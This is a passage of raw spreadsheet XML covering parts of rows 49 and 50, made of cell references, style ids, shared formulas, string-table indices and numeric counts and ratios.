      <c r="BU49" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV49" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW49" s="104">
        <v>1917.0</v>
      </c>
      <c r="BX49" s="104">
        <v>1.0</v>
      </c>
      <c r="BY49" s="104">
        <v>4.0</v>
      </c>
      <c r="BZ49" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA49" s="104">
        <v>1917.0</v>
      </c>
      <c r="CB49" s="104">
        <v>1.0</v>
      </c>
      <c r="CC49" s="104">
        <v>4.0</v>
      </c>
      <c r="CD49" s="104">
        <v>1917.0</v>
      </c>
      <c r="CE49" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF49" s="104">
        <f t="shared" si="90"/>
        <v>1917</v>
      </c>
      <c r="CG49" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH49" s="104">
        <v>1917.0</v>
      </c>
      <c r="CI49" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ49" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK49" s="104">
        <v>0.0</v>
      </c>
      <c r="CL49" s="104">
        <v>0.0</v>
      </c>
      <c r="CM49" s="105">
        <v>4.0</v>
      </c>
      <c r="CN49" s="105">
        <v>1.0</v>
      </c>
      <c r="CO49" s="105">
        <v>4.0</v>
      </c>
      <c r="CP49" s="105">
        <v>4.0</v>
      </c>
      <c r="CQ49" s="105">
        <v>0.0</v>
      </c>
      <c r="CR49" s="105">
        <v>4.0</v>
      </c>
      <c r="CS49" s="105">
        <v>0.0</v>
      </c>
      <c r="CT49" s="105">
        <v>0.0</v>
      </c>
      <c r="CU49" s="105">
        <v>0.0</v>
      </c>
      <c r="CV49" s="105">
        <v>0.0</v>
      </c>
      <c r="CW49" s="105">
        <v>1.0</v>
      </c>
      <c r="CX49" s="105">
        <v>4.0</v>
      </c>
      <c r="CY49" s="105">
        <v>4.0</v>
      </c>
      <c r="CZ49" s="105">
        <v>0.0</v>
      </c>
      <c r="DA49" s="105">
        <v>4.0</v>
      </c>
      <c r="DB49" s="106">
        <f t="shared" si="15"/>
        <v>0.3333333333</v>
      </c>
      <c r="DC49" s="106">
        <f t="shared" si="16"/>
        <v>0.3333333333</v>
      </c>
      <c r="DD49" s="106">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DE49" s="106">
        <f t="shared" si="18"/>
        <v>1.333333333</v>
      </c>
      <c r="DF49" s="106">
        <f t="shared" si="19"/>
        <v>1.333333333</v>
      </c>
      <c r="DG49" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH49" s="106">
        <f t="shared" si="21"/>
        <v>1.333333333</v>
      </c>
      <c r="DI49" s="106">
        <f t="shared" si="22"/>
        <v>1.333333333</v>
      </c>
      <c r="DJ49" s="106">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DK49" s="107">
        <f t="shared" si="77"/>
        <v>0</v>
      </c>
      <c r="DL49" s="106">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="DM49" s="108" t="s">
        <v>1023</v>
      </c>
      <c r="DN49" s="108">
        <v>2.0</v>
      </c>
      <c r="DO49" s="108">
        <v>244.0</v>
      </c>
      <c r="DP49" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ49" s="108" t="s">
        <v>1023</v>
      </c>
      <c r="DR49" s="108">
        <v>2.0</v>
      </c>
      <c r="DS49" s="108">
        <v>244.0</v>
      </c>
      <c r="DT49" s="108" t="s">
        <v>1023</v>
      </c>
      <c r="DU49" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV49" s="108" t="str">
        <f t="shared" si="91"/>
        <v>1917, 50447</v>
      </c>
      <c r="DW49" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX49" s="108" t="s">
        <v>1023</v>
      </c>
      <c r="DY49" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ49" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA49" s="108">
        <v>0.0</v>
      </c>
      <c r="EB49" s="108">
        <v>0.0</v>
      </c>
      <c r="EC49" s="109">
        <v>4.0</v>
      </c>
      <c r="ED49" s="109">
        <v>1.0</v>
      </c>
      <c r="EE49" s="109">
        <v>5.0</v>
      </c>
      <c r="EF49" s="109">
        <v>244.0</v>
      </c>
      <c r="EG49" s="109">
        <v>0.0</v>
      </c>
      <c r="EH49" s="109">
        <v>244.0</v>
      </c>
      <c r="EI49" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ49" s="109">
        <v>0.0</v>
      </c>
      <c r="EK49" s="109">
        <v>0.0</v>
      </c>
      <c r="EL49" s="109">
        <v>0.0</v>
      </c>
      <c r="EM49" s="109">
        <v>1.0</v>
      </c>
      <c r="EN49" s="109">
        <v>5.0</v>
      </c>
      <c r="EO49" s="109">
        <v>244.0</v>
      </c>
      <c r="EP49" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ49" s="109">
        <v>244.0</v>
      </c>
      <c r="ER49" s="110">
        <f t="shared" si="27"/>
        <v>0.3333333333</v>
      </c>
      <c r="ES49" s="110">
        <f t="shared" si="28"/>
        <v>0.3333333333</v>
      </c>
      <c r="ET49" s="110">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="EU49" s="110">
        <f t="shared" si="30"/>
        <v>1.666666667</v>
      </c>
      <c r="EV49" s="110">
        <f t="shared" si="31"/>
        <v>1.666666667</v>
      </c>
      <c r="EW49" s="110">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="EX49" s="110">
        <f t="shared" si="33"/>
        <v>81.33333333</v>
      </c>
      <c r="EY49" s="110">
        <f t="shared" si="34"/>
        <v>81.33333333</v>
      </c>
      <c r="EZ49" s="110">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="FA49" s="110">
        <f t="shared" si="79"/>
        <v>0</v>
      </c>
      <c r="FB49" s="110">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="FC49" s="111" t="s">
        <v>1024</v>
      </c>
      <c r="FD49" s="111">
        <v>6.0</v>
      </c>
      <c r="FE49" s="111">
        <v>253.0</v>
      </c>
      <c r="FF49" s="101" t="s">
        <v>385</v>
      </c>
      <c r="FG49" s="111" t="s">
        <v>1025</v>
      </c>
      <c r="FH49" s="111">
        <v>5.0</v>
      </c>
      <c r="FI49" s="111">
        <v>245.0</v>
      </c>
      <c r="FJ49" s="111" t="s">
        <v>1024</v>
      </c>
      <c r="FK49" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL49" s="111" t="str">
        <f t="shared" si="95"/>
        <v>2002752, 2002749, 2101917, 2011085, 1917, 50447</v>
      </c>
      <c r="FM49" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN49" s="111" t="s">
        <v>1024</v>
      </c>
      <c r="FO49" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP49" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ49" s="111">
        <v>0.0</v>
      </c>
      <c r="FR49" s="111">
        <v>0.0</v>
      </c>
      <c r="FS49" s="112">
        <v>4.0</v>
      </c>
      <c r="FT49" s="112">
        <v>2.0</v>
      </c>
      <c r="FU49" s="112">
        <v>8.0</v>
      </c>
      <c r="FV49" s="112">
        <v>244.0</v>
      </c>
      <c r="FW49" s="112">
        <v>9.0</v>
      </c>
      <c r="FX49" s="112">
        <v>253.0</v>
      </c>
      <c r="FY49" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ49" s="112">
        <v>0.0</v>
      </c>
      <c r="GA49" s="112">
        <v>0.0</v>
      </c>
      <c r="GB49" s="112">
        <v>0.0</v>
      </c>
      <c r="GC49" s="112">
        <v>2.0</v>
      </c>
      <c r="GD49" s="112">
        <v>6.0</v>
      </c>
      <c r="GE49" s="112">
        <v>244.0</v>
      </c>
      <c r="GF49" s="112">
        <v>1.0</v>
      </c>
      <c r="GG49" s="112">
        <v>245.0</v>
      </c>
      <c r="GH49" s="113">
        <f t="shared" si="39"/>
        <v>0.6666666667</v>
      </c>
      <c r="GI49" s="113">
        <f t="shared" si="40"/>
        <v>0.6666666667</v>
      </c>
      <c r="GJ49" s="113">
        <f t="shared" si="41"/>
        <v>0</v>
      </c>
      <c r="GK49" s="113">
        <f t="shared" si="42"/>
        <v>2.666666667</v>
      </c>
      <c r="GL49" s="113">
        <f t="shared" si="43"/>
        <v>2</v>
      </c>
      <c r="GM49" s="113">
        <f t="shared" si="44"/>
        <v>0</v>
      </c>
      <c r="GN49" s="113">
        <f t="shared" si="45"/>
        <v>84.33333333</v>
      </c>
      <c r="GO49" s="113">
        <f t="shared" si="46"/>
        <v>81.66666667</v>
      </c>
      <c r="GP49" s="113">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="GQ49" s="114">
        <f t="shared" si="81"/>
        <v>0</v>
      </c>
      <c r="GR49" s="113">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="GS49" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT49" s="94"/>
      <c r="GU49" s="116">
        <v>49480.0</v>
      </c>
      <c r="GV49" s="116">
        <v>1.0</v>
      </c>
      <c r="GW49" s="116">
        <v>3.0</v>
      </c>
      <c r="GX49" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY49" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ49" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA49" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB49" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC49" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD49" s="131">
        <v>49480.0</v>
      </c>
      <c r="HE49" s="131">
        <v>49480.0</v>
      </c>
      <c r="HF49" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG49" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH49" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI49" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ49" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK49" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL49" s="93">
        <v>4.0</v>
      </c>
      <c r="HM49" s="93">
        <f t="shared" si="83"/>
        <v>3</v>
      </c>
      <c r="HN49" s="93">
        <v>3.0</v>
      </c>
      <c r="HO49" s="93">
        <v>0.0</v>
      </c>
      <c r="HP49" s="93">
        <v>3.0</v>
      </c>
      <c r="HQ49" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR49" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS49" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT49" s="139"/>
      <c r="HU49" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV49" s="119" t="s">
        <v>1026</v>
      </c>
      <c r="HW49" s="119">
        <v>3.0</v>
      </c>
      <c r="HX49" s="119">
        <v>340.0</v>
      </c>
      <c r="HY49" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ49" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA49" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB49" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC49" s="120" t="s">
        <v>1027</v>
      </c>
      <c r="ID49" s="120">
        <v>59219.0</v>
      </c>
      <c r="IE49" s="120">
        <v>9999.0</v>
      </c>
      <c r="IF49" s="120" t="s">
        <v>1028</v>
      </c>
      <c r="IG49" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH49" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II49" s="99" t="s">
        <v>1029</v>
      </c>
      <c r="IJ49" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK49" s="99">
        <v>3.0</v>
      </c>
      <c r="IL49" s="99">
        <v>3.0</v>
      </c>
      <c r="IM49" s="121">
        <f t="shared" si="93"/>
        <v>3</v>
      </c>
      <c r="IN49" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO49" s="98">
        <v>3.0</v>
      </c>
      <c r="IP49" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ49" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR49" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS49" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT49" s="127"/>
      <c r="IU49" s="127"/>
      <c r="IV49" s="127"/>
      <c r="IW49" s="127"/>
      <c r="IX49" s="127"/>
      <c r="IY49" s="127"/>
      <c r="IZ49" s="127"/>
      <c r="JA49" s="127"/>
      <c r="JB49" s="127"/>
      <c r="JC49" s="127"/>
      <c r="JD49" s="127"/>
      <c r="JE49" s="127"/>
      <c r="JF49" s="127"/>
      <c r="JG49" s="127"/>
      <c r="JH49" s="127"/>
      <c r="JI49" s="127"/>
      <c r="JJ49" s="127"/>
      <c r="JK49" s="127"/>
      <c r="JL49" s="127"/>
      <c r="JM49" s="127"/>
      <c r="JN49" s="127"/>
      <c r="JO49" s="127"/>
      <c r="JP49" s="127"/>
      <c r="JQ49" s="127"/>
      <c r="JR49" s="127"/>
      <c r="JS49" s="127"/>
      <c r="JT49" s="127"/>
      <c r="JU49" s="127"/>
      <c r="JV49" s="127"/>
      <c r="JW49" s="127"/>
      <c r="JX49" s="127"/>
      <c r="JY49" s="127"/>
      <c r="JZ49" s="127"/>
      <c r="KA49" s="127"/>
      <c r="KB49" s="127"/>
      <c r="KC49" s="127"/>
      <c r="KD49" s="127"/>
      <c r="KE49" s="127"/>
      <c r="KF49" s="127"/>
      <c r="KG49" s="127"/>
      <c r="KH49" s="127"/>
      <c r="KI49" s="127"/>
      <c r="KJ49" s="127"/>
      <c r="KK49" s="127"/>
      <c r="KL49" s="127"/>
      <c r="KM49" s="127"/>
      <c r="KN49" s="127"/>
      <c r="KO49" s="127"/>
      <c r="KP49" s="127"/>
      <c r="KQ49" s="127"/>
      <c r="KR49" s="127"/>
      <c r="KS49" s="127"/>
      <c r="KT49" s="127"/>
      <c r="KU49" s="127"/>
      <c r="KV49" s="127"/>
      <c r="KW49" s="127"/>
      <c r="KX49" s="127"/>
      <c r="KY49" s="127"/>
      <c r="KZ49" s="127"/>
      <c r="LA49" s="127"/>
      <c r="LB49" s="127"/>
      <c r="LC49" s="127"/>
      <c r="LD49" s="127"/>
      <c r="LE49" s="127"/>
      <c r="LF49" s="127"/>
      <c r="LG49" s="127"/>
      <c r="LH49" s="127"/>
      <c r="LI49" s="127"/>
      <c r="LJ49" s="127"/>
      <c r="LK49" s="127"/>
      <c r="LL49" s="127"/>
      <c r="LM49" s="127"/>
      <c r="LN49" s="127"/>
      <c r="LO49" s="127"/>
      <c r="LP49" s="127"/>
      <c r="LQ49" s="127"/>
      <c r="LR49" s="127"/>
      <c r="LS49" s="127"/>
      <c r="LT49" s="127"/>
      <c r="LU49" s="127"/>
      <c r="LV49" s="127"/>
      <c r="LW49" s="127"/>
      <c r="LX49" s="127"/>
      <c r="LY49" s="127"/>
      <c r="LZ49" s="127"/>
      <c r="MA49" s="127"/>
      <c r="MB49" s="127"/>
      <c r="MC49" s="127"/>
      <c r="MD49" s="127"/>
      <c r="ME49" s="127"/>
      <c r="MF49" s="127"/>
      <c r="MG49" s="127"/>
      <c r="MH49" s="127"/>
      <c r="MI49" s="127"/>
      <c r="MJ49" s="127"/>
      <c r="MK49" s="127"/>
      <c r="ML49" s="127"/>
      <c r="MM49" s="127"/>
      <c r="MN49" s="127"/>
      <c r="MO49" s="127"/>
      <c r="MP49" s="127"/>
      <c r="MQ49" s="127"/>
      <c r="MR49" s="127"/>
      <c r="MS49" s="127"/>
      <c r="MT49" s="127"/>
      <c r="MU49" s="127"/>
      <c r="MV49" s="127"/>
      <c r="MW49" s="127"/>
      <c r="MX49" s="127"/>
      <c r="MY49" s="127"/>
      <c r="MZ49" s="127"/>
      <c r="NA49" s="127"/>
      <c r="NB49" s="127"/>
      <c r="NC49" s="127"/>
      <c r="ND49" s="127"/>
      <c r="NE49" s="127"/>
      <c r="NF49" s="127"/>
      <c r="NG49" s="127"/>
      <c r="NH49" s="127"/>
      <c r="NI49" s="127"/>
      <c r="NJ49" s="127"/>
      <c r="NK49" s="127"/>
      <c r="NL49" s="127"/>
      <c r="NM49" s="127"/>
      <c r="NN49" s="127"/>
      <c r="NO49" s="127"/>
      <c r="NP49" s="127"/>
      <c r="NQ49" s="127"/>
      <c r="NR49" s="127"/>
      <c r="NS49" s="127"/>
      <c r="NT49" s="127"/>
      <c r="NU49" s="127"/>
      <c r="NV49" s="127"/>
      <c r="NW49" s="127"/>
      <c r="NX49" s="127"/>
      <c r="NY49" s="127"/>
    </row>
    <row r="50" ht="153.75" customHeight="1">
      <c r="B50" s="89" t="s">
        <v>951</v>
      </c>
      <c r="C50" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D50" s="90" t="s">
        <v>952</v>
      </c>
      <c r="E50" s="90" t="s">
        <v>1012</v>
      </c>
      <c r="F50" s="90" t="s">
        <v>1013</v>
      </c>
      <c r="G50" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H50" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I50" s="92" t="s">
        <v>1030</v>
      </c>
      <c r="J50" s="92" t="s">
        <v>1015</v>
      </c>
      <c r="K50" s="92" t="s">
        <v>1031</v>
      </c>
      <c r="L50" s="93" t="s">
        <v>375</v>
      </c>
      <c r="M50" s="93">
        <v>1.0</v>
      </c>
      <c r="N50" s="93">
        <v>1.0</v>
      </c>
      <c r="O50" s="93">
        <v>0.0</v>
      </c>
      <c r="P50" s="93">
        <v>1.0</v>
      </c>
      <c r="Q50" s="93">
        <f t="shared" si="94"/>
        <v>1</v>
      </c>
      <c r="R50" s="93">
        <v>1.0</v>
      </c>
      <c r="S50" s="93">
        <v>0.0</v>
      </c>
      <c r="T50" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U50" s="98" t="s">
        <v>224</v>
      </c>
      <c r="V50" s="126" t="s">
        <v>1032</v>
      </c>
      <c r="W50" s="96" t="s">
        <v>1033</v>
      </c>
      <c r="X50" s="97" t="s">
        <v>1019</v>
      </c>
      <c r="Y50" s="96" t="s">
        <v>1020</v>
      </c>
      <c r="Z50" s="96" t="s">
        <v>1021</v>
      </c>
      <c r="AA50" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB50" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC50" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD50" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE50" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF50" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG50" s="98" t="s">
        <v>306</v>
      </c>
      <c r="AH50" s="99" t="s">
        <v>1034</v>
      </c>
      <c r="AI50" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ50" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK50" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL50" s="100">
        <v>0.0</v>
      </c>
      <c r="AM50" s="100">
        <v>0.0</v>
      </c>
      <c r="AN50" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO50" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP50" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ50" s="100">
        <v>0.0</v>
      </c>
      <c r="AR50" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS50" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT50" s="100" t="str">
        <f t="shared" si="89"/>
        <v>-</v>
      </c>
      <c r="AU50" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV50" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW50" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX50" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY50" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ50" s="100">
        <v>0.0</v>
      </c>
      <c r="BA50" s="102">
        <v>1.0</v>
      </c>
      <c r="BB50" s="102">
        <v>0.0</v>
      </c>
      <c r="BC50" s="102">
        <v>0.0</v>
      </c>
      <c r="BD50" s="102">
        <v>0.0</v>
      </c>
      <c r="BE50" s="102">
        <v>0.0</v>
      </c>
      <c r="BF50" s="102">
        <v>0.0</v>
      </c>
      <c r="BG50" s="102">
        <v>0.0</v>
      </c>
      <c r="BH50" s="102">
        <v>0.0</v>
      </c>
      <c r="BI50" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ50" s="102">
        <v>0.0</v>
      </c>
      <c r="BK50" s="102">
        <v>0.0</v>
      </c>
      <c r="BL50" s="103">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BM50" s="103">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="BN50" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO50" s="103">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="BP50" s="103">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="BQ50" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR50" s="103">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="BS50" s="103">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="BT50" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU50" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV50" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW50" s="104">
        <v>2016141.0</v>
      </c>
      <c r="BX50" s="104">
        <v>1.0</v>
      </c>
      <c r="BY50" s="104">
        <v>1.0</v>
      </c>
      <c r="BZ50" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA50" s="104">
        <v>2016141.0</v>
      </c>
      <c r="CB50" s="104">
        <v>1.0</v>
      </c>
      <c r="CC50" s="104">
        <v>1.0</v>
      </c>
      <c r="CD50" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE50" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF50" s="104" t="str">
        <f t="shared" si="90"/>
        <v>-</v>
      </c>
      <c r="CG50" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH50" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI50" s="104">
        <v>2016141.0</v>
      </c>
      <c r="CJ50" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK50" s="104">
        <v>1.0</v>
      </c>
      <c r="CL50" s="104">
        <v>1.0</v>
      </c>
      <c r="CM50" s="105">
        <v>1.0</v>
      </c>
      <c r="CN50" s="105">
        <v>1.0</v>
      </c>
      <c r="CO50" s="105">
        <v>1.0</v>
      </c>
      <c r="CP50" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ50" s="105">
        <v>1.0</v>
      </c>
      <c r="CR50" s="105">
        <v>1.0</v>
      </c>
      <c r="CS50" s="105">
        <v>1.0</v>
      </c>
      <c r="CT50" s="105">
        <v>0.0</v>
      </c>
      <c r="CU50" s="105">
        <v>1.0</v>
      </c>
      <c r="CV50" s="105">
        <v>1.0</v>
      </c>
      <c r="CW50" s="105">
        <v>1.0</v>
      </c>
      <c r="CX50" s="105">
        <v>1.0</v>
      </c>
      <c r="CY50" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ50" s="105">
        <v>1.0</v>
      </c>
      <c r="DA50" s="105">
        <v>1.0</v>
      </c>
      <c r="DB50" s="106">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="DC50" s="106">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="DD50" s="106">
        <f t="shared" si="17"/>
        <v>1</v>
      </c>
      <c r="DE50" s="106">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
      <c r="DF50" s="106">
        <f t="shared" si="19"/>
        <v>1</v>
      </c>
      <c r="DG50" s="106">
        <f t="shared" si="20"/>
        <v>1</v>
      </c>
      <c r="DH50" s="106">
        <f t="shared" si="21"/>
        <v>1</v>
      </c>
      <c r="DI50" s="106">
        <f t="shared" si="22"/>
        <v>1</v>
      </c>
      <c r="DJ50" s="106">
        <f t="shared" si="23"/>
        <v>1</v>
      </c>
      <c r="DK50" s="107">
        <f t="shared" si="77"/>
        <v>1</v>
      </c>
      <c r="DL50" s="106">
        <f t="shared" si="78"/>
        <v>1</v>
      </c>
      <c r="DM50" s="108" t="s">
        <v>1035</v>
      </c>
      <c r="DN50" s="108">
        <v>2.0</v>
      </c>
      <c r="DO50" s="108">
        <v>4.0</v>
      </c>
      <c r="DP50" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ50" s="108" t="s">
        <v>1035</v>
      </c>
      <c r="DR50" s="108">
        <v>2.0</v>
      </c>
      <c r="DS50" s="108">
        <v>4.0</v>
      </c>
      <c r="DT50" s="108">
        <v>50447.0</v>
      </c>
      <c r="DU50" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV50" s="108">
        <f t="shared" si="91"/>
        <v>50447</v>
      </c>
      <c r="DW50" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX50" s="108">
        <v>50447.0</v>
      </c>
      <c r="DY50" s="108">
        <v>2016141.0</v>
      </c>
      <c r="DZ50" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA50" s="108">
        <v>1.0</v>
      </c>
      <c r="EB50" s="108">
        <v>1.0</v>
      </c>
      <c r="EC50" s="109">
        <v>1.0</v>
      </c>
      <c r="ED50" s="109">
        <v>1.0</v>
      </c>
      <c r="EE50" s="109">
        <v>2.0</v>
      </c>
      <c r="EF50" s="109">
        <v>3.0</v>
      </c>
      <c r="EG50" s="109">
        <v>1.0</v>
      </c>
      <c r="EH50" s="109">
        <v>4.0</v>
      </c>
      <c r="EI50" s="109">
        <v>1.0</v>
      </c>
      <c r="EJ50" s="109">
        <v>0.0</v>
      </c>
      <c r="EK50" s="109">
        <v>1.0</v>
      </c>
      <c r="EL50" s="109">
        <v>1.0</v>
      </c>
      <c r="EM50" s="109">
        <v>1.0</v>
      </c>
      <c r="EN50" s="109">
        <v>2.0</v>
      </c>
      <c r="EO50" s="109">
        <v>3.0</v>
      </c>
      <c r="EP50" s="109">
        <v>1.0</v>
      </c>
      <c r="EQ50" s="109">
        <v>4.0</v>
      </c>
      <c r="ER50" s="110">
        <f t="shared" si="27"/>
        <v>1</v>
      </c>
      <c r="ES50" s="110">
        <f t="shared" si="28"/>
        <v>1</v>
      </c>
      <c r="ET50" s="110">
        <f t="shared" si="29"/>
        <v>1</v>
      </c>
      <c r="EU50" s="110">
        <f t="shared" si="30"/>
        <v>2</v>
      </c>
      <c r="EV50" s="110">
        <f t="shared" si="31"/>
        <v>2</v>
      </c>
      <c r="EW50" s="110">
        <f t="shared" si="32"/>
        <v>1</v>
      </c>
      <c r="EX50" s="110">
        <f t="shared" si="33"/>
        <v>4</v>
      </c>
      <c r="EY50" s="110">
        <f t="shared" si="34"/>
        <v>4</v>
      </c>
      <c r="EZ50" s="110">
        <f t="shared" si="35"/>
        <v>1</v>
      </c>
      <c r="FA50" s="110">
        <f t="shared" si="79"/>
        <v>1</v>
      </c>
      <c r="FB50" s="110">
        <f t="shared" si="80"/>
        <v>1</v>
      </c>
      <c r="FC50" s="111" t="s">
        <v>1036</v>
      </c>
      <c r="FD50" s="111">
        <v>6.0</v>
      </c>
      <c r="FE50" s="111">
        <v>10.0</v>
      </c>
      <c r="FF50" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG50" s="111" t="s">
        <v>1037</v>
      </c>
      <c r="FH50" s="111">
        <v>4.0</v>
      </c>
      <c r="FI50" s="111">
        <v>6.0</v>
      </c>
      <c r="FJ50" s="111" t="s">
        <v>1038</v>
      </c>
      <c r="FK50" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL50" s="111" t="str">
        <f t="shared" si="95"/>
        <v>2002752, 2002749, 50447, 2011085</v>
      </c>
      <c r="FM50" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN50" s="111" t="s">
        <v>1038</v>
      </c>
      <c r="FO50" s="111" t="s">
        <v>1039</v>
      </c>
      <c r="FP50" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ50" s="111">
        <v>2.0</v>
      </c>
      <c r="FR50" s="111">
        <v>2.0</v>
      </c>
      <c r="FS50" s="112">
        <v>1.0</v>
      </c>
      <c r="FT50" s="112">
        <v>1.0</v>
      </c>
      <c r="FU50" s="112">
        <v>5.0</v>
      </c>
      <c r="FV50" s="112">
        <v>3.0</v>
      </c>
      <c r="FW50" s="112">
        <v>7.0</v>
      </c>
      <c r="FX50" s="112">
        <v>10.0</v>
      </c>
      <c r="FY50" s="112">
        <v>1.0</v>
      </c>
      <c r="FZ50" s="112">
        <v>0.0</v>
      </c>
      <c r="GA50" s="112">
        <v>1.0</v>
      </c>
      <c r="GB50" s="112">
        <v>1.0</v>
      </c>
      <c r="GC50" s="112">
        <v>1.0</v>
      </c>
      <c r="GD50" s="112">
        <v>3.0</v>
      </c>
      <c r="GE50" s="112">
        <v>3.0</v>
      </c>
      <c r="GF50" s="112">
        <v>3.0</v>
      </c>
      <c r="GG50" s="112">
        <v>6.0</v>
      </c>
      <c r="GH50" s="113">
        <f t="shared" si="39"/>
        <v>1</v>
      </c>
      <c r="GI50" s="113">
        <f t="shared" si="40"/>
        <v>1</v>
      </c>
      <c r="GJ50" s="113">
        <f t="shared" si="41"/>
        <v>1</v>
      </c>
      <c r="GK50" s="113">
        <f t="shared" si="42"/>
        <v>5</v>
      </c>
